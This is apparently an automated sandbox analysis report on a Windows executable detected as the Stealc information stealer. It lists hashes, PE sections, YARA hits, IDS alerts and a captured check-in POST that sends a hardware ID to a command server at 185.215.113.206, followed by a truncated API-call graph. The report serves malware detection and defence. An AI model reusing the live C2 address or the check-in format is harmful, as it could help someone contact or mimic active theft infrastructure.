                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed; the report is missing behavior information
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe
                                      No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer | 185.215.113.206/6c4adf523b719729.php
                                      No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                | file.exe | malicious | Stealc | 185.215.113.206
                | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm | 185.215.113.206
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                | file.exe | malicious | Stealc | 185.215.113.206
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                | file.exe | malicious | Stealc | 185.215.113.206
                | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer | 185.215.113.206
                                      No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.957701409174607
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'095'104 bytes
                                      MD5:3d17618b1108053c2643a92804657456
                                      SHA1:92d6f817db761936dbe341a58edcfbdb3f778de7
                                      SHA256:06485350aa2fecbc8b68c4bf5e2e507030065fd92794425da145c74b6804c41c
                                      SHA512:d81540bb792ca8b1314772ffdac8c3d8fb604a1baf239ec925cff191edf6911aec8b00631d6f4744393df7bacb37d1c69e4336c2d90fe95218b8a88421a46d32
                                      SSDEEP:49152:mwH4Nl8k3voLs1IXdeAE9TqIR1v99BUw3r7J8eJ1:mwarQLXtejwIP9UwPOeJ
                                      TLSH:C3A5336D9B392FF8C6CC0972DEEB9D55B2ED09898481001B9244D1FCE383D9BB5E605E
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0xb14000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                      Instruction
                                      jmp 00007FC41C52991Ah
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | bee5e8624cdc148e9c1d03408cee4711 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x294000 | 0x200 | ed9ebf47f1cd5628e8f696b6328eb381 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lolfhxxi | 0x57e000 | 0x195000 | 0x194600 | 0a633e3f5a6348ebbee67e741df9b45d | False | 0.994913422527048 | data | 7.954139609313276 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
swlqukzj | 0x713000 | 0x1000 | 0x600 | f0d3fc564744a5124e113a49c2cd136b | False | 0.5677083333333334 | data | 4.94972615643025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x714000 | 0x3000 | 0x2200 | d19411689211f4d5ddf280d926226dd9 | False | 0.06192555147058824 | DOS executable (COM) | 0.7138032536749443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T12:18:08.346910+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49702 | 185.215.113.206 | 80 | TCP
2024-10-31T12:18:21.407485+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.7 | 49744 | TCP
2024-10-31T12:18:59.653745+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.7 | 49952 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 12:18:06.956082106 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Oct 31, 2024 12:18:07.136071920 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Oct 31, 2024 12:18:07.136231899 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Oct 31, 2024 12:18:07.137228012 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Oct 31, 2024 12:18:07.142072916 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Oct 31, 2024 12:18:08.054258108 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Oct 31, 2024 12:18:08.054369926 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Oct 31, 2024 12:18:08.057276011 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Oct 31, 2024 12:18:08.062099934 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Oct 31, 2024 12:18:08.346822023 CET | 80 | 49702 | 185.215.113.206 | 192.168.2.7
Oct 31, 2024 12:18:08.346910000 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
Oct 31, 2024 12:18:11.828041077 CET | 49702 | 80 | 192.168.2.7 | 185.215.113.206
                                      • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 185.215.113.206 | 80 | 5456 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 12:18:07.137228012 CET | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Oct 31, 2024 12:18:08.054258108 CET | 203 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 11:18:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 31, 2024 12:18:08.057276011 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 38 36 35 35 44 37 31 46 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a
Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"698655D71FEC2273848308------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"tale------EBAAAFBGDBKKEBGCFCBF--
Oct 31, 2024 12:18:08.346822023 CET | 210 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 11:18:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=



                                      Target ID:0
                                      Start time:07:18:01
                                      Start date:31/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x7b0000
                                      File size:2'095'104 bytes
                                      MD5 hash:3D17618B1108053C2643A92804657456
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:3.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:2.9%
                                        Total number of Nodes:1329
                                        Total number of Limit Nodes:24
API calls 38135->38136 38137 7b3785 38136->38137 38138 7b4610 2 API calls 38137->38138 38139 7b379e 38138->38139 38140 7b4610 2 API calls 38139->38140 38141 7b37b7 38140->38141 38142 7b4610 2 API calls 38141->38142 38143 7b37d0 38142->38143 38144 7b4610 2 API calls 38143->38144 38145 7b37e9 38144->38145 38146 7b4610 2 API calls 38145->38146 38147 7b3802 38146->38147 38148 7b4610 2 API calls 38147->38148 38149 7b381b 38148->38149 38150 7b4610 2 API calls 38149->38150 38151 7b3834 38150->38151 38152 7b4610 2 API calls 38151->38152 38153 7b384d 38152->38153 38154 7b4610 2 API calls 38153->38154 38155 7b3866 38154->38155 38156 7b4610 2 API calls 38155->38156 38157 7b387f 38156->38157 38158 7b4610 2 API calls 38157->38158 38159 7b3898 38158->38159 38160 7b4610 2 API calls 38159->38160 38161 7b38b1 38160->38161 38162 7b4610 2 API calls 38161->38162 38163 7b38ca 38162->38163 38164 7b4610 2 API calls 38163->38164 38165 7b38e3 38164->38165 38166 7b4610 2 API calls 38165->38166 38167 7b38fc 38166->38167 38168 7b4610 2 API calls 38167->38168 38169 7b3915 38168->38169 38170 7b4610 2 API calls 38169->38170 38171 7b392e 38170->38171 38172 7b4610 2 API calls 38171->38172 38173 7b3947 38172->38173 38174 7b4610 2 API calls 38173->38174 38175 7b3960 38174->38175 38176 7b4610 2 API calls 38175->38176 38177 7b3979 38176->38177 38178 7b4610 2 API calls 38177->38178 38179 7b3992 38178->38179 38180 7b4610 2 API calls 38179->38180 38181 7b39ab 38180->38181 38182 7b4610 2 API calls 38181->38182 38183 7b39c4 38182->38183 38184 7b4610 2 API calls 38183->38184 38185 7b39dd 38184->38185 38186 7b4610 2 API calls 38185->38186 38187 7b39f6 38186->38187 38188 7b4610 2 API calls 38187->38188 38189 7b3a0f 38188->38189 38190 7b4610 2 API calls 38189->38190 38191 7b3a28 38190->38191 38192 7b4610 2 API calls 38191->38192 38193 7b3a41 38192->38193 38194 7b4610 2 API calls 38193->38194 38195 7b3a5a 38194->38195 38196 7b4610 2 API calls 38195->38196 38197 7b3a73 38196->38197 38198 7b4610 2 API calls 
38197->38198 38199 7b3a8c 38198->38199 38200 7b4610 2 API calls 38199->38200 38201 7b3aa5 38200->38201 38202 7b4610 2 API calls 38201->38202 38203 7b3abe 38202->38203 38204 7b4610 2 API calls 38203->38204 38205 7b3ad7 38204->38205 38206 7b4610 2 API calls 38205->38206 38207 7b3af0 38206->38207 38208 7b4610 2 API calls 38207->38208 38209 7b3b09 38208->38209 38210 7b4610 2 API calls 38209->38210 38211 7b3b22 38210->38211 38212 7b4610 2 API calls 38211->38212 38213 7b3b3b 38212->38213 38214 7b4610 2 API calls 38213->38214 38215 7b3b54 38214->38215 38216 7b4610 2 API calls 38215->38216 38217 7b3b6d 38216->38217 38218 7b4610 2 API calls 38217->38218 38219 7b3b86 38218->38219 38220 7b4610 2 API calls 38219->38220 38221 7b3b9f 38220->38221 38222 7b4610 2 API calls 38221->38222 38223 7b3bb8 38222->38223 38224 7b4610 2 API calls 38223->38224 38225 7b3bd1 38224->38225 38226 7b4610 2 API calls 38225->38226 38227 7b3bea 38226->38227 38228 7b4610 2 API calls 38227->38228 38229 7b3c03 38228->38229 38230 7b4610 2 API calls 38229->38230 38231 7b3c1c 38230->38231 38232 7b4610 2 API calls 38231->38232 38233 7b3c35 38232->38233 38234 7b4610 2 API calls 38233->38234 38235 7b3c4e 38234->38235 38236 7b4610 2 API calls 38235->38236 38237 7b3c67 38236->38237 38238 7b4610 2 API calls 38237->38238 38239 7b3c80 38238->38239 38240 7b4610 2 API calls 38239->38240 38241 7b3c99 38240->38241 38242 7b4610 2 API calls 38241->38242 38243 7b3cb2 38242->38243 38244 7b4610 2 API calls 38243->38244 38245 7b3ccb 38244->38245 38246 7b4610 2 API calls 38245->38246 38247 7b3ce4 38246->38247 38248 7b4610 2 API calls 38247->38248 38249 7b3cfd 38248->38249 38250 7b4610 2 API calls 38249->38250 38251 7b3d16 38250->38251 38252 7b4610 2 API calls 38251->38252 38253 7b3d2f 38252->38253 38254 7b4610 2 API calls 38253->38254 38255 7b3d48 38254->38255 38256 7b4610 2 API calls 38255->38256 38257 7b3d61 38256->38257 38258 7b4610 2 API calls 38257->38258 38259 7b3d7a 38258->38259 38260 7b4610 2 API calls 38259->38260 
38261 7b3d93 38260->38261 38262 7b4610 2 API calls 38261->38262 38263 7b3dac 38262->38263 38264 7b4610 2 API calls 38263->38264 38265 7b3dc5 38264->38265 38266 7b4610 2 API calls 38265->38266 38267 7b3dde 38266->38267 38268 7b4610 2 API calls 38267->38268 38269 7b3df7 38268->38269 38270 7b4610 2 API calls 38269->38270 38271 7b3e10 38270->38271 38272 7b4610 2 API calls 38271->38272 38273 7b3e29 38272->38273 38274 7b4610 2 API calls 38273->38274 38275 7b3e42 38274->38275 38276 7b4610 2 API calls 38275->38276 38277 7b3e5b 38276->38277 38278 7b4610 2 API calls 38277->38278 38279 7b3e74 38278->38279 38280 7b4610 2 API calls 38279->38280 38281 7b3e8d 38280->38281 38282 7b4610 2 API calls 38281->38282 38283 7b3ea6 38282->38283 38284 7b4610 2 API calls 38283->38284 38285 7b3ebf 38284->38285 38286 7b4610 2 API calls 38285->38286 38287 7b3ed8 38286->38287 38288 7b4610 2 API calls 38287->38288 38289 7b3ef1 38288->38289 38290 7b4610 2 API calls 38289->38290 38291 7b3f0a 38290->38291 38292 7b4610 2 API calls 38291->38292 38293 7b3f23 38292->38293 38294 7b4610 2 API calls 38293->38294 38295 7b3f3c 38294->38295 38296 7b4610 2 API calls 38295->38296 38297 7b3f55 38296->38297 38298 7b4610 2 API calls 38297->38298 38299 7b3f6e 38298->38299 38300 7b4610 2 API calls 38299->38300 38301 7b3f87 38300->38301 38302 7b4610 2 API calls 38301->38302 38303 7b3fa0 38302->38303 38304 7b4610 2 API calls 38303->38304 38305 7b3fb9 38304->38305 38306 7b4610 2 API calls 38305->38306 38307 7b3fd2 38306->38307 38308 7b4610 2 API calls 38307->38308 38309 7b3feb 38308->38309 38310 7b4610 2 API calls 38309->38310 38311 7b4004 38310->38311 38312 7b4610 2 API calls 38311->38312 38313 7b401d 38312->38313 38314 7b4610 2 API calls 38313->38314 38315 7b4036 38314->38315 38316 7b4610 2 API calls 38315->38316 38317 7b404f 38316->38317 38318 7b4610 2 API calls 38317->38318 38319 7b4068 38318->38319 38320 7b4610 2 API calls 38319->38320 38321 7b4081 38320->38321 38322 7b4610 2 API calls 38321->38322 38323 7b409a 
38322->38323 38324 7b4610 2 API calls 38323->38324 38325 7b40b3 38324->38325 38326 7b4610 2 API calls 38325->38326 38327 7b40cc 38326->38327 38328 7b4610 2 API calls 38327->38328 38329 7b40e5 38328->38329 38330 7b4610 2 API calls 38329->38330 38331 7b40fe 38330->38331 38332 7b4610 2 API calls 38331->38332 38333 7b4117 38332->38333 38334 7b4610 2 API calls 38333->38334 38335 7b4130 38334->38335 38336 7b4610 2 API calls 38335->38336 38337 7b4149 38336->38337 38338 7b4610 2 API calls 38337->38338 38339 7b4162 38338->38339 38340 7b4610 2 API calls 38339->38340 38341 7b417b 38340->38341 38342 7b4610 2 API calls 38341->38342 38343 7b4194 38342->38343 38344 7b4610 2 API calls 38343->38344 38345 7b41ad 38344->38345 38346 7b4610 2 API calls 38345->38346 38347 7b41c6 38346->38347 38348 7b4610 2 API calls 38347->38348 38349 7b41df 38348->38349 38350 7b4610 2 API calls 38349->38350 38351 7b41f8 38350->38351 38352 7b4610 2 API calls 38351->38352 38353 7b4211 38352->38353 38354 7b4610 2 API calls 38353->38354 38355 7b422a 38354->38355 38356 7b4610 2 API calls 38355->38356 38357 7b4243 38356->38357 38358 7b4610 2 API calls 38357->38358 38359 7b425c 38358->38359 38360 7b4610 2 API calls 38359->38360 38361 7b4275 38360->38361 38362 7b4610 2 API calls 38361->38362 38363 7b428e 38362->38363 38364 7b4610 2 API calls 38363->38364 38365 7b42a7 38364->38365 38366 7b4610 2 API calls 38365->38366 38367 7b42c0 38366->38367 38368 7b4610 2 API calls 38367->38368 38369 7b42d9 38368->38369 38370 7b4610 2 API calls 38369->38370 38371 7b42f2 38370->38371 38372 7b4610 2 API calls 38371->38372 38373 7b430b 38372->38373 38374 7b4610 2 API calls 38373->38374 38375 7b4324 38374->38375 38376 7b4610 2 API calls 38375->38376 38377 7b433d 38376->38377 38378 7b4610 2 API calls 38377->38378 38379 7b4356 38378->38379 38380 7b4610 2 API calls 38379->38380 38381 7b436f 38380->38381 38382 7b4610 2 API calls 38381->38382 38383 7b4388 38382->38383 38384 7b4610 2 API calls 38383->38384 38385 7b43a1 38384->38385 
38386 7b4610 2 API calls 38385->38386 38387 7b43ba 38386->38387 38388 7b4610 2 API calls 38387->38388 38389 7b43d3 38388->38389 38390 7b4610 2 API calls 38389->38390 38391 7b43ec 38390->38391 38392 7b4610 2 API calls 38391->38392 38393 7b4405 38392->38393 38394 7b4610 2 API calls 38393->38394 38395 7b441e 38394->38395 38396 7b4610 2 API calls 38395->38396 38397 7b4437 38396->38397 38398 7b4610 2 API calls 38397->38398 38399 7b4450 38398->38399 38400 7b4610 2 API calls 38399->38400 38401 7b4469 38400->38401 38402 7b4610 2 API calls 38401->38402 38403 7b4482 38402->38403 38404 7b4610 2 API calls 38403->38404 38405 7b449b 38404->38405 38406 7b4610 2 API calls 38405->38406 38407 7b44b4 38406->38407 38408 7b4610 2 API calls 38407->38408 38409 7b44cd 38408->38409 38410 7b4610 2 API calls 38409->38410 38411 7b44e6 38410->38411 38412 7b4610 2 API calls 38411->38412 38413 7b44ff 38412->38413 38414 7b4610 2 API calls 38413->38414 38415 7b4518 38414->38415 38416 7b4610 2 API calls 38415->38416 38417 7b4531 38416->38417 38418 7b4610 2 API calls 38417->38418 38419 7b454a 38418->38419 38420 7b4610 2 API calls 38419->38420 38421 7b4563 38420->38421 38422 7b4610 2 API calls 38421->38422 38423 7b457c 38422->38423 38424 7b4610 2 API calls 38423->38424 38425 7b4595 38424->38425 38426 7b4610 2 API calls 38425->38426 38427 7b45ae 38426->38427 38428 7b4610 2 API calls 38427->38428 38429 7b45c7 38428->38429 38430 7b4610 2 API calls 38429->38430 38431 7b45e0 38430->38431 38432 7b4610 2 API calls 38431->38432 38433 7b45f9 38432->38433 38434 7c9f20 38433->38434 38435 7ca346 8 API calls 38434->38435 38436 7c9f30 43 API calls 38434->38436 38437 7ca3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38435->38437 38438 7ca456 38435->38438 38436->38435 38437->38438 38439 7ca526 38438->38439 38440 7ca463 8 API calls 38438->38440 38441 7ca52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38439->38441 38442 7ca5a8 38439->38442 38440->38439 
38441->38442 38443 7ca5b5 6 API calls 38442->38443 38444 7ca647 38442->38444 38443->38444 38445 7ca72f 38444->38445 38446 7ca654 9 API calls 38444->38446 38447 7ca738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38445->38447 38448 7ca7b2 38445->38448 38446->38445 38447->38448 38449 7ca7ec 38448->38449 38450 7ca7bb GetProcAddress GetProcAddress 38448->38450 38451 7ca825 38449->38451 38452 7ca7f5 GetProcAddress GetProcAddress 38449->38452 38450->38449 38453 7ca922 38451->38453 38454 7ca832 10 API calls 38451->38454 38452->38451 38455 7ca98d 38453->38455 38456 7ca92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38453->38456 38454->38453 38457 7ca9ae 38455->38457 38458 7ca996 GetProcAddress 38455->38458 38456->38455 38459 7c5ef3 38457->38459 38460 7ca9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38457->38460 38458->38457 38461 7b1590 38459->38461 38460->38459 38731 7b16b0 38461->38731 38464 7caab0 lstrcpy 38465 7b15b5 38464->38465 38466 7caab0 lstrcpy 38465->38466 38467 7b15c7 38466->38467 38468 7caab0 lstrcpy 38467->38468 38469 7b15d9 38468->38469 38470 7caab0 lstrcpy 38469->38470 38471 7b1663 38470->38471 38472 7c5760 38471->38472 38473 7c5771 38472->38473 38474 7cab30 2 API calls 38473->38474 38475 7c577e 38474->38475 38476 7cab30 2 API calls 38475->38476 38477 7c578b 38476->38477 38478 7cab30 2 API calls 38477->38478 38479 7c5798 38478->38479 38480 7caa50 lstrcpy 38479->38480 38481 7c57a5 38480->38481 38482 7caa50 lstrcpy 38481->38482 38483 7c57b2 38482->38483 38484 7caa50 lstrcpy 38483->38484 38485 7c57bf 38484->38485 38486 7caa50 lstrcpy 38485->38486 38508 7c57cc 38486->38508 38487 7c5893 StrCmpCA 38487->38508 38488 7c58f0 StrCmpCA 38489 7c5a2c 38488->38489 38488->38508 38490 7cabb0 lstrcpy 38489->38490 38491 7c5a38 38490->38491 38492 7cab30 2 API calls 38491->38492 38494 7c5a46 38492->38494 38493 7cab30 lstrlen lstrcpy 38493->38508 38496 7cab30 2 API calls 38494->38496 38495 7c5aa6 StrCmpCA 38497 
7c5be1 38495->38497 38495->38508 38501 7c5a55 38496->38501 38500 7cabb0 lstrcpy 38497->38500 38498 7caa50 lstrcpy 38498->38508 38499 7caab0 lstrcpy 38499->38508 38502 7c5bed 38500->38502 38503 7b16b0 lstrcpy 38501->38503 38505 7cab30 2 API calls 38502->38505 38526 7c5a61 38503->38526 38504 7b1590 lstrcpy 38504->38508 38506 7c5bfb 38505->38506 38510 7cab30 2 API calls 38506->38510 38507 7c5c5b StrCmpCA 38511 7c5c78 38507->38511 38512 7c5c66 Sleep 38507->38512 38508->38487 38508->38488 38508->38493 38508->38495 38508->38498 38508->38499 38508->38504 38508->38507 38509 7c5440 20 API calls 38508->38509 38519 7c5510 25 API calls 38508->38519 38521 7c59da StrCmpCA 38508->38521 38523 7cabb0 lstrcpy 38508->38523 38525 7c5b8f StrCmpCA 38508->38525 38509->38508 38513 7c5c0a 38510->38513 38514 7cabb0 lstrcpy 38511->38514 38512->38508 38515 7b16b0 lstrcpy 38513->38515 38516 7c5c84 38514->38516 38515->38526 38517 7cab30 2 API calls 38516->38517 38518 7c5c93 38517->38518 38520 7cab30 2 API calls 38518->38520 38519->38508 38522 7c5ca2 38520->38522 38521->38508 38524 7b16b0 lstrcpy 38522->38524 38523->38508 38524->38526 38525->38508 38526->37579 38528 7c76dc 38527->38528 38529 7c76e3 GetVolumeInformationA 38527->38529 38528->38529 38530 7c7721 38529->38530 38531 7c778c GetProcessHeap RtlAllocateHeap 38530->38531 38532 7c77b8 wsprintfA 38531->38532 38533 7c77a9 38531->38533 38535 7caa50 lstrcpy 38532->38535 38534 7caa50 lstrcpy 38533->38534 38536 7c5ff7 38534->38536 38535->38536 38536->37600 38538 7caab0 lstrcpy 38537->38538 38539 7b48e9 38538->38539 38740 7b4800 38539->38740 38541 7b48f5 38542 7caa50 lstrcpy 38541->38542 38543 7b4927 38542->38543 38544 7caa50 lstrcpy 38543->38544 38545 7b4934 38544->38545 38546 7caa50 lstrcpy 38545->38546 38547 7b4941 38546->38547 38548 7caa50 lstrcpy 38547->38548 38549 7b494e 38548->38549 38550 7caa50 lstrcpy 38549->38550 38551 7b495b InternetOpenA StrCmpCA 38550->38551 38552 7b4994 38551->38552 38553 7b4f1b InternetCloseHandle 38552->38553 38746 
